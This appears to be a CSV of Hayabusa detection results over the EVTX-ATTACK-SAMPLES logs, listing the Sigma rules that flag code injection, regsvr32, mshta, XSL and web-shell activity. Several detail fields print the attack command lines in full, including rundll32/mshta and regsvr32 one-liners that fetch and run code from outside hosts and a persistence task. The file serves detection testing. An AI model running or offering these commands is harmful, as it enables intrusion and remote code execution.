2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:18.833 +09:00,IEWIN7,7,high,In-memory PowerShell,,rules/sigma/image_load/sysmon_in_memory_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:50:36.858 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Execution - jscript9 engine invoked via clsid  :  Command: winpm.exe  //e:{16d51579-a30b-4c8b-a276-0ff4dc41e755} winpm_update.js  :  Path: C:\ProgramData\winpm.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
2019-05-19 02:51:14.254 +09:00,IEWIN7,1,informational,Process Creation,Command: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll  :  Path: C:\Windows\System32\regsvr32.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories  :  Command: attrib  +h nbtscan.exe  :  Path: C:\Windows\System32\attrib.exe  :  User: insecurebank\Administrator  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx
2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,low,Hiding Files with Attrib.exe,,rules/sigma/process_creation/win_attrib_hiding_files.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx
2019-05-21 09:35:07.308 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\com-hijack.exe""   :  Path: C:\Users\IEUser\Downloads\com-hijack.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:07.308 +09:00,IEWIN7,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:07.474 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c test.bat  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:07.474 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /c pause  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Users\IEUser\Downloads\com-hijack.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:07.518 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""  :  Path: C:\Program Files\Mozilla Firefox\firefox.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\cmd.exe /c test.bat",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:07.870 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.0.153744822\2027949517"" -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 956 gpu  :  Path: C:\Program Files\Mozilla Firefox\firefox.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:08.279 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:08.728 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe""   :  Path: C:\Windows\System32\calc.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:08.728 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.6.1176946839\1268428683"" -childID 1 -isForBrowser -prefsHandle 1844 -prefMapHandle 1836 -prefsLen 1 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 1680 tab  :  Path: C:\Program Files\Mozilla Firefox\firefox.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:10.161 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.13.1464597065\1561502721"" -childID 2 -isForBrowser -prefsHandle 2432 -prefMapHandle 2436 -prefsLen 5401 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 2448 tab  :  Path: C:\Program Files\Mozilla Firefox\firefox.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:12.705 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.20.1502540827\1989220046"" -childID 3 -isForBrowser -prefsHandle 3032 -prefMapHandle 3056 -prefsLen 6207 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 3024 tab  :  Path: C:\Program Files\Mozilla Firefox\firefox.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-22 00:32:57.286 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe  /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:57.286 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe  javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);  :  Path: C:\Windows\System32\rundll32.exe  :  User: IEWIN7\IEUser  :  Parent Command: cmd.exe  /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:57.867 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt  :  Path: C:\Windows\System32\mshta.exe  :  User: IEWIN7\IEUser  :  Parent Command: rundll32.exe  javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:59.769 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR ""mshta.exe https://hotelesms.com/Injection.txt"" /F   :  Path: C:\Windows\System32\schtasks.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:59.769 +09:00,IEWIN7,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:59.769 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 13:02:11.307 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:1600 CREDAT:275470 /prefetch:2",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx
2019-05-24 01:49:05.736 +09:00,IEWIN7,1,informational,Process Creation,"Command: wmic  process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl""  :  Path: C:\Windows\System32\wbem\WMIC.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 01:49:07.731 +09:00,IEWIN7,11,high,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 01:49:08.422 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: wmic  process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 01:50:44.582 +09:00,IEWIN7,1,informational,Process Creation,Command: wmiadap.exe /F /T /R  :  Path: C:\Windows\System32\wbem\WMIADAP.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 02:26:08.716 +09:00,IEWIN7,1,informational,Process Creation,"Command: msxsl.exe  c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat  :  Path: \\vboxsrv\HTools\msxsl.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx
2019-05-24 02:26:08.716 +09:00,IEWIN7,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx
2019-05-24 02:26:09.437 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: msxsl.exe  c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx
2019-05-24 02:45:34.538 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx
2019-05-24 02:46:04.671 +09:00,IEWIN7,1,informational,Process Creation,"Command: netsh  I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5  :  Path: C:\Windows\System32\netsh.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx
2019-05-24 02:46:04.671 +09:00,IEWIN7,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx
2019-05-24 02:46:04.671 +09:00,IEWIN7,1,high,Netsh RDP Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd_3389.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx
2019-05-24 10:33:53.112 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\windows\system32\cmd.exe"" /c net user  :  Path: C:\Windows\System32\cmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-24 10:33:53.112 +09:00,IEWIN7,1,high,Shells Spawned by Web Servers,,rules/sigma/process_creation/win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-24 10:33:53.122 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-24 10:33:53.182 +09:00,IEWIN7,1,informational,Process Creation,"Command: net  user  :  Path: C:\Windows\System32\net.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""c:\windows\system32\cmd.exe"" /c net user",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-24 10:33:53.192 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\net1  user  :  Path: C:\Windows\System32\net1.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: net  user,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-26 13:01:42.385 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe""   :  Path: C:\Users\IEUser\Desktop\info.rar\jjs.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
2019-05-26 13:01:42.966 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe""  :  Path: C:\Users\IEUser\Desktop\info.rar\jjs.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
2019-05-26 13:01:43.567 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\svchost.exe  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
2019-05-26 13:01:43.567 +09:00,IEWIN7,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
2019-05-26 13:01:43.567 +09:00,IEWIN7,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
2019-05-26 13:01:43.567 +09:00,IEWIN7,1,critical,Suspect Svchost Activity,,rules/sigma/process_creation/win_susp_svchost_no_cli.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
2019-05-27 00:47:56.667 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\System32\notepad.exe  :  Path: C:\Windows\System32\notepad.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:47:56.667 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:47:56.727 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:47:57.628 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
